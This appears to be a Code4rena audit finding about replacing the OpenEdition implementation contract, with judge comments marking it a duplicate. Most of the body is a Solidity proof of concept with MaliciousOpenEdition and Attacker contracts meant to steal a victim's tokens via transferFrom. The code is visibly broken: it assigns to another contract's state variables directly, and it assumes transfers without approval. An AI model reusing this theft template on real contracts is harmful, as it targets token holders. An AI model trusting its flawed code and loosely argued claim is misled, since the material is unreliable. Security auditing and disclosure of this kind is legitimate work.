Platform: Code4rena
Start Date: 06/12/2022
Pot Size: $36,500 USDC
Total HM: 16
Participants: 119
Period: 3 days
Judge: berndartmueller
Total Solo HM: 2
Id: 189
League: ETH
Rank: 54/119
Findings: 1
Award: $57.63
🌟 Selected for report: 0
🚀 Solo Findings: 0
57.6274 USDC - $57.63
It is possible that an attacker could set the implementation contract to a different contract that has the same function signatures, which could cause unexpected behavior when creating new OpenEdition contracts
pragma solidity ^0.8.17;
import {OpenEdition} from "./OpenEdition.sol"; import {IEscher721} from "../interfaces/IEscher721.sol";
contract MaliciousOpenEdition is OpenEdition { // The malicious contract should have the same function signatures as the OpenEdition contract
// Attacker-controlled variables address public victim; uint256 public stolenTokens; // Function to steal tokens from the victim function stealTokens() public { require(victim != address(0), "VICTIM NOT SET"); require(stolenTokens > 0, "INVALID TOKEN AMOUNT"); // Steal tokens from the victim IEscher721(token).transferFrom(victim, address(this), stolenTokens); }
}
// Attacker contract contract Attacker { // Create an instance of the MaliciousOpenEdition contract MaliciousOpenEdition public malicious = new MaliciousOpenEdition();
// Set the victim and stolen token amount in the MaliciousOpenEdition contract function setVictim(address payable _victim, uint256 _stolenTokens) public { malicious.victim = _victim; malicious.stolenTokens = _stolenTokens; } // Steal tokens from the victim function stealTokens() public { malicious.stealTokens(); }
}
It is important to verify properly that implementation is an instance of OpenEdition.
#0 - c4-judge
2022-12-13T11:56:53Z
berndartmueller marked the issue as duplicate of #176
#1 - c4-judge
2023-01-03T09:54:18Z
berndartmueller marked the issue as satisfactory